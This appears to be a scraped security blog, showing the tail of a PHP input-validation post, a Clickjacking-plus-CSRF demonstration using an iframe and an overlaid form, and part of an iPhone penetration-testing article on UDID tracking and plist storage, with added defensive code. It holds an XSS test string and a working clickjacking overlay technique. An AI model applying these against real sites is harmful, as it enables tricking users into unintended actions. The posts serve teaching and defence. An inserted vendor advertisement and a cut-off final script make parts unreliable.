<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;">Note: </span><span style="font-family: "cambria"; font-size: 12.000000pt;">Ideally the username should be replaced with a temporary user id (preferably random, and
expiring along with the session cookie). Using regular expressions to strip parts of the input and then
processing what is left is not recommended: once malicious input is identified it
should be rejected (e.g. test it with preg_match and refuse it, instead of stripping it with preg_replace as above). Also note that this validation
should ideally be part of the validateCredentials function as well, or the input should be validated before
it is used by the validateCredentials function. </span><br />
<br />
<span style="font-family: "cambria"; font-size: 12.000000pt;"><u>2nd Layer of defense</u></span><br />
<span style="font-family: "cambria"; font-size: 12.000000pt;"><br /></span>
<br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">// ENT_QUOTES makes the function convert both double and single quotes.
$safeUsername = htmlentities($username, ENT_QUOTES, 'UTF-8');
</code></pre>
<br />
<span style="font-family: "cambria"; font-size: 12.000000pt;">Input: </span><br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> <script>alert(1)</script>
</code></pre>
<br />
<span style="font-family: "cambria"; font-size: 16.363636016845703px;">Output:</span><br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">&lt;script&gt;alert(1)&lt;/script&gt;
</code></pre>
<br />
<br />
<span style="font-family: "cambria"; font-size: 12.000000pt; font-weight: 700;">Note: </span><span style="font-family: "cambria"; font-size: 12.000000pt;">With </span><span style="color: rgb(32.941180% , 55.294120% , 83.137260%); font-family: "cambria"; font-size: 12.000000pt; font-style: italic;">htmlentities, </span><span style="font-family: "cambria"; font-size: 12.000000pt;">all characters which have HTML character entity equivalents are translated
into these entities (displayed above); for this input only the angle brackets are affected, so htmlspecialchars() would give the same result. Always pass the character set ('UTF-8') so that the encoder interprets the bytes the same way the browser does. </span><br />
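Added example (not code from the original post) putting the two layers side by side: allow-list validation that rejects rather than strips, and output encoding with an explicit character set. The ^[A-Za-z0-9_-]{1,32}$ policy and the 32-character limit are assumptions. The run also shows why stripping is a bad idea: bob<x> silently becomes bobx, a name that may belong to somebody else.

```php
<?php
// Added example (not from the original post): reject-not-strip validation of the
// username, then context-aware output encoding. The allowed-character policy and
// the 32-character limit are assumptions, not requirements from the post.
declare(strict_types=1);

// 1st layer: allow-list validation. Returns the username unchanged or null; nothing
// is stripped, so "bob<x>" is refused instead of silently becoming "bobx".
function validate_username(string $username): ?string
{
    return preg_match('/^[A-Za-z0-9_-]{1,32}$/', $username) === 1 ? $username : null;
}

// What the post's "strip with preg_replace" approach does to the same inputs.
function strip_username(string $username): string
{
    return preg_replace('/[^A-Za-z0-9_-]+/', '', $username) ?? '';
}

// 2nd layer: encode for the HTML body / attribute context. ENT_QUOTES covers both
// quote characters; the charset argument keeps the encoder and the browser in step.
function html_encode(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Demonstration with constructed inputs.
$inputs = ['alice', '<script>alert(1)</script>', 'bob<x>', 'bobx'];
foreach ($inputs as $raw) {
    printf("%-28s validate=%-6s strip=%-20s encoded=%s\n",
        $raw,
        validate_username($raw) === null ? 'reject' : 'ok',
        strip_username($raw),
        html_encode($raw));
}
// alice                        validate=ok     strip=alice                encoded=alice
// <script>alert(1)</script>    validate=reject strip=scriptalert1script   encoded=&lt;script&gt;alert(1)&lt;/script&gt;
// bob<x>                       validate=reject strip=bobx                 encoded=bob&lt;x&gt;
// bobx                         validate=ok     strip=bobx                 encoded=bobx
```

Validation decides whether the request is processed at all; encoding protects the page that eventually displays the value. Neither replaces the other, and the encoding has to match the output context (a value written into a JavaScript string or a URL needs a different encoder than the HTML body shown here).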
<br />
<span style="font-family: "cambria"; font-size: 12pt; font-weight: 700;">References:</span><br />
<br />
<ol>
<li><span style="color: blue; font-family: "cambria"; font-size: 12pt;">https://www.owasp.org/index.php/Account_lockout_attack</span></li>
<li><span style="color: blue; font-family: "cambria"; font-size: 12pt;">http://stackoverflow.com/questions/17217777/difference-between-unset-and-session-unset-in-php</span></li>
<li><span style="color: blue; font-family: "cambria"; font-size: 12pt;">http://shiflett.org/articles/session-fixation</span></li>
<li><span style="color: blue; font-family: "cambria"; font-size: 12pt;">http://shiflett.org/articles/session-hijacking</span></li>
</ol>
<br /><div class="blogger-post-footer">Penetest Horror Blog</div>
<h2 style="text-align: left;">Clickalicious Candies... (published 2014-04-06)</h2>
<b>Introduction</b><br />
<b><br /></b>
This article is written to show that Clickjacking should not be underestimated as a vulnerability, especially when combined with other vulnerabilities. Clickjacking (user interface redress attack) is a malicious technique of tricking a web user into clicking on something different from what they perceive they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages. That is good in theory, but how can someone do that in practice? The answer is simple, <b>ridiculously easy...</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlGnt6JWmNV_hdNCZB8QiOSJCtF-UAU3MWldeiYQn7y2DM0X8TjTmrvmmfgMkb9lkITGT8vF9u1KKu3AWa-IaVUICZ7WqlRdkCrASXpSCPUxuVWDm9LWxmSaO-_9JeJgeUqdhtB_7SUOQ/s1600/somethinghot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlGnt6JWmNV_hdNCZB8QiOSJCtF-UAU3MWldeiYQn7y2DM0X8TjTmrvmmfgMkb9lkITGT8vF9u1KKu3AWa-IaVUICZ7WqlRdkCrASXpSCPUxuVWDm9LWxmSaO-_9JeJgeUqdhtB_7SUOQ/s1600/somethinghot.png" height="200" width="320" /></a></div>
<br />
Even a script kiddie can become a "hacker" con artist when combining vulnerabilities. In this post I am going to show how a simple CSRF attack can be combined with a Clickjacking attack; of course the same thing can happen with vulnerabilities such as session fixation and XSS.<br />
<br />
<b>The Clickalicious Attack</b><br />
<br />
In order to perform the attack we rely on the following assumptions:<br />
<ol>
<li>We identified a website that is vulnerable to Clickjacking (e.g. it is missing the X-Frame-Options header).</li>
<li>The same web site is also vulnerable to CSRF (e.g. the vulnerable request is a simple HTML form with no anti-CSRF token). </li>
<li>The CSRF vulnerability lets a malicious user submit the form with polluted hidden form fields (for simplicity I am going to use a simple HTML form for the demo). </li>
</ol>
<b>Step 1: </b>Frame the vulnerable web site in our iframe; in this example I am going to use www.w3schools.com (such a lovely site).<br />
<br />
<pre style="background-image: URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3qbnxnkiTVXh1m2Lc3yBHbRBwca8_HFqWV3dH01ibUvc8zTXkZE4_pZNJbKCH4RmmEjgcfKerS1or5Rc58PG8oDqXqsNVdJueFXeZPolRCvh45wJaR0HeJ-UtdwIQ9_D0AtkDX5jfwmd-/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> <iframe src="http://www.w3schools.com"></iframe>
</code></pre>
<br />
The visual outcome of this code would be:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDn6TzOSlsGilQ87PGi_d_mUAIaWxv5nuzckeH5hk9hNEeayVf0ikTCzeo2OnYi-P6FR8s22v3P30viJqmZUlRCTcMss09Ybqv8UZoIp_CR4f4e3h0XD1ehpqkJ6Ubj0CUYdbFDr96iaM/s1600/c1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDn6TzOSlsGilQ87PGi_d_mUAIaWxv5nuzckeH5hk9hNEeayVf0ikTCzeo2OnYi-P6FR8s22v3P30viJqmZUlRCTcMss09Ybqv8UZoIp_CR4f4e3h0XD1ehpqkJ6Ubj0CUYdbFDr96iaM/s1600/c1.png" height="158" width="320" /></a></div>
<b><br /></b><b>Note:</b> The picture above displays only the iframe and not the whole page. In this particular example the HTML page was loaded from my hard disk.<br />
<b><br /></b>
<b>Step 2: </b>Project the CSRF form onto the vulnerable web site within the iframe created in Step 1. The source code to do that is:<br />
<br />
<pre style="background-color: #f0f0f0; background-position: initial initial; background-repeat: initial initial; border: 1px dashed rgb(204, 204, 204); font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> <html>
<body>
<head>
<style>
</code><code style="word-wrap: normal;"><span style="color: red;"> form
{
position:absolute;
left:30px;
top:100px;
}</span></code><code style="color: black; word-wrap: normal;">
</style>
</head>
<form>
First name: <input type="text" name="firstname"><br>
Last name: <input type="text" name="lastname">
</form>
<iframe src="http://www.w3schools.com"></iframe>
</body>
</html>
</code></pre>
<br />
See the CSS absolute positioning? CSS 2.1 defines three positioning schemes:<br />
<ol>
<li>Normal flow</li>
<li>Floats</li>
<li>Absolute positioning</li>
</ol>
Out of these three we are interested in absolute positioning. An absolutely positioned element has no place in, and <u>no effect on, the normal flow of other items</u>. It occupies its assigned position in its container independently of other items, which is why the attacker's form can be drawn on top of the framed page. The visual outcome of this code would be:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7eKt85dX9plZEwooJGK2ggiL2FpJeiXEBQZL3-JAMKh85JKdw1w8ANJLDuHamLMRWLLTMJm04aYUcVDj69Ec4d18tj1CoNPbrNRPnhkKtv8v73x_gZBZOU0VUxUObhl_fIHBuiqBxv_M/s1600/c3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7eKt85dX9plZEwooJGK2ggiL2FpJeiXEBQZL3-JAMKh85JKdw1w8ANJLDuHamLMRWLLTMJm04aYUcVDj69Ec4d18tj1CoNPbrNRPnhkKtv8v73x_gZBZOU0VUxUObhl_fIHBuiqBxv_M/s1600/c3.png" height="161" width="320" /></a></div>
<br />
<b>Note:</b> The same exploit can be built using a stored XSS. The only difference is that you would have to project the vulnerable CSRF form within the space controlled by the XSS (without needing a Clickjacking vulnerability).<br />
<br />
Tools such as NoScript are able to detect the Clickjacking attack:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiA5kkveL2j7KJpqhCDjhYKoOpJL-u9sl6ez1crW6i5DvHAbpMmOnKOS06NXGSdVRWD6LJUeqjC3ShKzU06JmVdsJiRhwUIqvI6LiO-VMnlI-G2jkGa_nqWo4OMvlh0_AMmqQWDfuWFjjQ/s1600/c4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiA5kkveL2j7KJpqhCDjhYKoOpJL-u9sl6ez1crW6i5DvHAbpMmOnKOS06NXGSdVRWD6LJUeqjC3ShKzU06JmVdsJiRhwUIqvI6LiO-VMnlI-G2jkGa_nqWo4OMvlh0_AMmqQWDfuWFjjQ/s1600/c4.png" /></a></div>
<br />
<b>Note:</b> See the icon stating that the script was blocked.<br />
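The attack works because the target does nothing to refuse framing and nothing to tie the form to the user's session. The following is an added example (not code from the original post) of the two server-side fixes in PHP: anti-framing headers plus a synchronizer CSRF token. The file name profile.php and the form field names are assumptions.

```php
<?php
// Added example (not from the original post): the two server-side controls that
// break the attack chain above. Framing is refused with X-Frame-Options and the
// CSP frame-ancestors directive, and the form carries a per-session synchronizer
// token so a forged or overlaid submission is rejected. File names are assumptions.
declare(strict_types=1);

function send_anti_framing_headers(): void
{
    // Legacy header for older browsers: DENY refuses every framer (SAMEORIGIN would allow own origin).
    header('X-Frame-Options: DENY');
    // Modern control; takes precedence over X-Frame-Options where both are supported.
    header("Content-Security-Policy: frame-ancestors 'none'");
}

// Synchronizer token: one random value per session, compared in constant time.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_token_is_valid(?string $submitted): bool
{
    return is_string($submitted)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

function html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

session_start();
send_anti_framing_headers();

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    if (!csrf_token_is_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token.');
    }
    // ... process the trusted form submission here ...
    exit('Profile updated for ' . html((string)($_POST['firstname'] ?? '')));
}
?>
<form method="post" action="profile.php">
  <input type="hidden" name="csrf_token" value="<?= html(csrf_token()) ?>">
  First name: <input type="text" name="firstname"><br>
  Last name:  <input type="text" name="lastname">
  <button type="submit">Save</button>
</form>
```

The token defeats the CSRF half of the chain even if the page can still be framed, because the attacker's overlaid form cannot know the victim's session-bound value; the headers defeat the Clickjacking half even if a token is forgotten somewhere. Set both, and verify them with a proxy rather than trusting the framework defaults.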
<br />
<b>Epilogue</b><br />
<br />
Next time you run a penetration test, think again before you rate a Clickjacking finding as low, especially if it is on a login page. And beware of the script kiddies. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJyUF8o0QtIc6vPlibP082zg1txB_exgsrfoqikQpdnnkwfxbBjYDztToXEUENzaYe5j2Dp6fy8wE3PKS9wqZDIQNX8zyLSrEEoMF8DKgYJ-eXkv6Nvtunnj55cBFKrC5Kn-9lOekEMOQ/s1600/eee.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJyUF8o0QtIc6vPlibP082zg1txB_exgsrfoqikQpdnnkwfxbBjYDztToXEUENzaYe5j2Dp6fy8wE3PKS9wqZDIQNX8zyLSrEEoMF8DKgYJ-eXkv6Nvtunnj55cBFKrC5Kn-9lOekEMOQ/s1600/eee.jpg" height="214" width="320" /></a></div>
<br />
The motto of this article is going to be: think before you click...<br />
<br />
<b>References:</b><br />
<ol>
<li><a href="http://www.w3schools.com/cssref/pr_class_position.asp" target="_blank">http://www.w3schools.com/cssref/pr_class_position.asp </a></li>
<li><a href="http://en.wikipedia.org/wiki/Cascading_Style_Sheets#Positioning" target="_blank">http://en.wikipedia.org/wiki/Cascading_Style_Sheets#Positioning</a></li>
</ol>
<div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-60452549238825592172013-09-21T14:06:00.002-07:002013-09-21T14:41:55.153-07:00The Hackers Guide To Dismantling IPhone (Part 3)<b>Introduction</b><br />
<b><br /></b>
On May 7, 2013, a German court ruled that the iPhone maker must alter its company policies for handling customer data, since these policies had been shown to violate Germany's privacy laws.<br />
<br />
The news first hit the Web via Bloomberg, which reported that:<br />
<br />
<i><span style="color: purple;">"Apple Inc. (AAPL), already facing a U.S. privacy lawsuit over its information-sharing practices, was told by a German court to change its rules for handling customer data.</span></i><br />
<i><span style="color: purple;">A Berlin court struck down eight of 15 provisions in Apple’s general data-use terms because they deviate too much from German laws, a consumer group said in a statement on its website today. The court said Apple can’t ask for “global consent” to use customer data or use information on the locations of customers.</span></i><br />
<i><span style="color: purple;">While Apple previously requested “global consent” to use customer data, German law requires that customers know in detail exactly what is being requested. Further to this, Apple may no longer ask for permission to access the names, addresses, and phone numbers of users’ contacts."</span></i><br />
<br />
Finally, the court also prohibited Apple from supplying such data to companies which use the information for advertising. But why does this happen?<br />
<br />
<b>More technical detail on the privacy issues</b><br />
<b><br /></b>
<br />
Every iPhone has an associated unique device identifier (UDID) derived from a set of hardware attributes. The UDID is burned into the device and cannot be removed or changed. However, it can be spoofed with the help of tools like UDID Faker.<br />
<br />
The UDID of the iPhone (as of the time of writing) is computed with the formula given below:<br />
<br />
<i><span style="color: purple;">UDID = SHA1(Serial Number + ECID + LOWERCASE (WiFi Address) + LOWERCASE(Bluetooth Address))</span></i><br />
<br />
The UDID is exposed to application developers through an API which allows them to read the UDID of an iPhone without requiring the device owner's permission. The code snippet below collects the UDID of a device, which can later be used to track the user's behaviour.<br />
<br />
<span style="background-color: white; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 12px; line-height: 13.1875px; white-space: pre;">NSString *uniqueIdentifier = [device uniqueIdentifier]</span><br />
<br />
With the help of the UDID it is possible to observe the user's browsing patterns and trace the user's geo location. As it is possible to locate the user's exact position with the help of a device UDID, it became a big privacy concern. More possible attacks are documented in Eric Smith's whitepaper on iPhone application privacy issues. Eric's research shows that 68% of applications silently send UDIDs to servers on the Internet. A perfect example of a serious privacy breach is the social gaming network OpenFeint.<br />
<br />
OpenFeint was a social platform for mobile games on Android and iOS. It was developed by Aurora Feint, a company named after a video game by the same developers. The platform consisted of an SDK for use by games, allowing its various social networking features to be integrated into the game's functionality. <u>OpenFeint was discontinued at the end of 2012</u>.<br />
<br />
OpenFeint collected device UDIDs and misused them by linking them to real-world user identities (email address, geo location latitude and longitude, Facebook profile picture) and making them publicly accessible, resulting in a serious privacy breach.<br />
<br />
While penetration testing, observe the network traffic for UDID transmission. A UDID in the network traffic indicates that the application is collecting the device identifier, or might be sending it to a third-party analytics company to track the user's behaviour. In iOS 5 Apple deprecated the API that gives access to the UDID (it was removed from the iOS 7 SDK, and identifierForVendor, available from iOS 6, is the replacement). Development best practice is not to use the API that collects the device UDID, as it breaches the privacy of the user. If developers want to keep track of the user's behaviour, they should create a unique identifier specific to the application instead of using the UDID. The disadvantage of an application-specific identifier is that it only identifies an installation instance of the application, not the device.<br />
<br />
Apart from the UDID, applications may transmit personally identifiable information such as age, name, address and location details to third-party analytics companies. Transmitting personally identifiable information to third-party companies without the user's knowledge also violates the user's privacy. So, during penetration testing, carefully observe the network traffic for the transmission of any important data.<br />
Example: the Pandora application was found to transmit the user's age and zip code to a third-party analytics company (doubleclick.net) in clear text. For applications which require the user's geo location (e.g. check-in services) to serve their content, it is always recommended to use the least degree of accuracy necessary. This can be achieved with the accuracy constants defined in the Core Location framework (e.g. <span style="color: purple;">kCLLocationAccuracyNearestTenMeters</span> assigned to the location manager's desiredAccuracy).<br />
<b><br /></b>
<b>Identifying UDID transmission</b><br />
<br />
Identifying whether the UDID of the iPhone is transmitted is easy. It can be done through a Man In The Middle attack or with a sniffer such as Wireshark. For example, when using Wireshark to sniff traffic you can very easily identify whether the UDID is transmitted by following the TCP stream.<br />
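Once you have the request text from a followed TCP stream or the proxy history, the check can be automated. The following Python script is an added example (not code from the original post); it flags the 40-hex-character UDID and the usual PII parameter names, and the sample requests and host names are constructed:<br />

```python
"""Flag iOS device identifiers and PII in captured HTTP requests.

Added example, not code from the original post. It scans raw HTTP request
text (a TCP stream followed in Wireshark, or a request copied from the proxy
history) for the 40-hex-character UDID and for parameter names that usually
carry personal data. The sample requests and host names are constructed.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# The UDID exposed by the deprecated API is a 40-character hexadecimal string.
UDID_RE = re.compile(r"\b[0-9a-fA-F]{40}\b")

# Parameter names that commonly carry personally identifiable information.
PII_PARAMS = {"age", "zip", "zipcode", "email", "dob", "gender",
              "lat", "lon", "latitude", "longitude"}


def parse_request(raw):
    """Split one raw HTTP request into its method, path, query, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    target_parts = urlsplit(target)
    return {"method": method, "path": target_parts.path,
            "query": target_parts.query, "headers": headers, "body": body}


def find_leaks(raw):
    """Return (location, name, kind) findings for one raw HTTP request."""
    req = parse_request(raw)
    findings = []

    params = parse_qsl(req["query"], keep_blank_values=True)
    content_type = req["headers"].get("content-type", "")
    if content_type.startswith("application/x-www-form-urlencoded"):
        params += parse_qsl(req["body"], keep_blank_values=True)

    for name, value in params:
        if UDID_RE.fullmatch(value):
            findings.append(("param", name, "UDID"))
        elif name.lower() in PII_PARAMS:
            findings.append(("param", name, "PII"))

    # Identifiers are also smuggled in custom headers and in the path itself.
    for header_name, header_value in req["headers"].items():
        if UDID_RE.search(header_value):
            findings.append(("header", header_name, "UDID"))
    if UDID_RE.search(req["path"]):
        findings.append(("path", req["path"], "UDID"))
    return findings


# Constructed sample traffic: an analytics beacon that ships the UDID, age
# and zip code in clear text, and a request that uses an app-specific
# install identifier instead (the recommended alternative).
SAMPLE_LEAKY = (
    "POST /track HTTP/1.1\r\n"
    "Host: analytics.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "udid=0123456789abcdef0123456789abcdef01234567&age=34&zip=94103"
)
SAMPLE_CLEAN = (
    "GET /feed?install_id=8d9b7d8e-1b5e-4cbb-9b50-2f7f7c0c8a3a HTTP/1.1\r\n"
    "Host: api.example\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, raw in (("leaky", SAMPLE_LEAKY), ("clean", SAMPLE_CLEAN)):
        print(label, find_leaks(raw) or "no identifiers found")
```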
<br />
<b>Local data storage security issues</b><br />
<br />
The iPhone stores data locally on the device to maintain essential information across application executions, for better performance or for offline access. Developers also use the local device storage to store information such as user preferences and application configurations. As device theft is becoming an increasing concern, especially in the enterprise, insecure local storage is considered to be the top risk among mobile application threats. A recent survey conducted by Viaforensics revealed that 76 percent of mobile applications store the user’s information on the device. <u>10 percent of them even store plain text passwords on the phone</u>.<br />
<br />
Sensitive information stored on the iPhone can be obtained by attackers in several ways. A few of them are listed below:<br />
<br />
<u>From Backups</u><br />
<br />
When an iPhone is connected to iTunes, iTunes automatically takes a backup of everything on the device. Upon backup, sensitive files will also end up on the workstation. So an attacker who gets access to the workstation can read the sensitive information from the stored backup files.<br />
<br />
More specifically backed-up information includes purchased music, TV shows, apps, and books; photos and video in the Camera Roll; device settings (for example, Phone Favorites, Wallpaper, and Mail, Contacts, Calendar accounts); app data; Home screen and app organization; Messages (iMessage, SMS, and MMS), ringtones, and more. Media files synced from your computer aren’t backed up, but can be restored by syncing with iTunes.<br />
<br />
iCloud automatically backs up the most important data on your device using iOS 5 or later. After you have enabled Backup on your iPhone, iPad, or iPod touch in <u>Settings > iCloud > Backup & Storage</u>, it will run on a daily basis as long as your device is:<br />
<br />
<ul>
<li>Connected to the Internet over Wi-Fi</li>
<li>Connected to a power source</li>
<li>Screen locked</li>
</ul>
<br />
<b>Note:</b> You can also back up manually whenever your device is connected to the Internet over Wi-Fi by choosing Back Up Now from <u>Settings > iCloud > Storage & Backup</u>.<br />
<br />
<u>Physical access to the device</u><br />
<br />
People lose their phones and phones get stolen very easily. In both cases, an attacker gets physical access to the device and can read the sensitive information stored on the phone. The passcode set on the device will not protect the information, as it is possible to brute force the iPhone simple passcode within 20 minutes. For more details about iPhone passcode bypass, go through the iPhone Forensics article available at – http://resources.infosecinstitute.com/iphone-forensics/.<br />
<br />
<u>Malware</u><br />
<br />
Leveraging a security weakness in iOS may allow an attacker to design a malware which can steal the files on the iPhone remotely. Practical attacks are demonstrated by Eric Monti in his presentation on iPhone Rootkit.<br />
<br />
<b>Directory structure</b><br />
<br />
In iOS, applications are treated as a bundle represented within a directory. The bundle groups all the application resources, binaries and other related files into a directory. On the iPhone, applications are executed within a jailed environment (sandbox or seatbelt) with mobile user privileges. Unlike Android's UID based segregation, all iOS applications run as one user. Apple says “The sandbox is a set of fine-grained controls limiting an application’s access to files, preferences, network resources, hardware, and so on. Each application has access to the contents of its own sandbox but cannot access other applications’ sandboxes. When an application is first installed on a device, the system creates the application’s home directory, sets up some key subdirectories, and sets up the security privileges for the sandbox“. A sandbox is a restricted environment that prevents applications from accessing unauthorized resources; however, upon iPhone JailBreak, sandbox protection gets disabled.<br />
<br />
When an application is installed on the iPhone, it creates a directory with a unique identifier under /var/mobile/Applications directory. Everything that is required for an application to execute will be contained in the created home directory. Typical iPhone application home directory structure is listed below.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/041812_1555_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/041812_1555_1.png" /></a></div>
<br />
<b>Plist files</b><br />
<br />
A property list (plist) file is a structured file which contains the essential configuration of a bundle executable in <u>nested key value pairs. Plist files are used to store the user preferences and the configuration information of an application.</u> For example, gaming applications usually store game levels and game scores in plist files. In general, applications store plist files under the [Application's Home Directory]/documents/preferences folder. A plist can be either in XML format or in binary format.<br />
<br />
As XML files are not the most efficient means of storage, most applications use binary formatted plist files. Binary formatted data stored in plist files can be easily viewed or modified using plist editors (e.g. plutil). Plist editors convert the binary formatted data into XML formatted data, which can then be edited easily. Plist files are primarily designed to store user preferences & application configuration; however, applications may use <u>plist files to store clear text usernames, passwords and session related information</u>.<br />
<br />
<b>ICanLocalize</b><br />
<br />
ICanLocalize allows translating plist files online as part of a Software Localization project. A parser goes through the plist file, extracts all the texts that need translation and makes them available to the translators. Translators translate only the texts, without worrying about the file format.<br />
<br />
When translation is complete, the new plist file is created. It has the exact same structure as the original file and only the right fields translated.<br />
<br />
For example, have a look at this plist file:<br />
<br />
<pre style="background-color: #f9f9f9; border: 1px solid rgb(204, 204, 204); color: #404040; font-size: 12px; line-height: 19px; padding: 9px;"><?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Year Of Birth</key>
<integer>1965</integer>
<key>Photo</key>
<data>
PEKBpYGlmYFCPAfekjf39495265Afgfg0052fj81DG==
</data>
<key>Hobby</key>
<string>Swimming</string>
<key>Jobs</key>
<array>
<string>Software engineer</string>
<string>Salesperson</string>
</array>
</dict>
</plist></pre>
<br />
<b>Note:</b> It includes several keys and values. There’s a binary Photo entry, an integer field called Year Of Birth and text fields called Hobby and Jobs (which is an array). If we translate this plist manually, we need to carefully watch out for the strings we should translate and the others that we must not translate.<br />
<br />
Of this entire file, we need to translate only the items that appear inside the <string> tags. Other texts must remain unchanged.<br />
<br />
<b>Translating as plist info</b><br />
<br />
Once you’re logged in to ICanLocalize, click on Translation Projects -> Software Localization and create a new project.<br />
<br />
Name it and give a quick description. You don’t need to tell about the format of plist files. Our system knows how to handle it. Instead, explain about what the plist file is used for. Tell about your application, target audience and the preferred writing style. Then, upload the plist file. You will see a list of texts which the parser extracted.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.icanlocalize.com/site/wp-content/uploads/2010/06/plist-extract-results.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.icanlocalize.com/site/wp-content/uploads/2010/06/plist-extract-results.png" height="353" width="640" /></a></div>
<br />
<b>Note:</b> Manipulating and altering plist files can be done with <a href="http://www.macroplant.com/iexplorer/" target="_blank">iExplorer</a>. Simply download iExplorer, open the plist files, modify them and then insert them back again.<br />
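The same binary-to-XML conversion that plutil performs can be scripted, which makes it easy to audit every plist in an application's home directory for credential-like keys. The script below is an added example (not from the original post or from ICanLocalize); it uses Python's standard plistlib, and the sample preferences file is constructed:<br />

```python
"""Audit a property list for credential-like entries.

Added example, not code from the original post. It converts a binary or XML
plist the way plutil does (using Python's plistlib), then walks the nested
key/value pairs looking for keys whose names suggest stored credentials or
session data. The sample preferences file below is constructed.
"""
import plistlib

# Key-name fragments that usually mark secrets kept in clear text.
SENSITIVE_KEY_WORDS = ("password", "passwd", "secret", "token", "session",
                       "apikey", "api_key", "auth")


def to_xml(plist_bytes):
    """Return the XML form of a plist, as 'plutil -convert xml1' would produce."""
    obj = plistlib.loads(plist_bytes)  # binary or XML input is auto-detected
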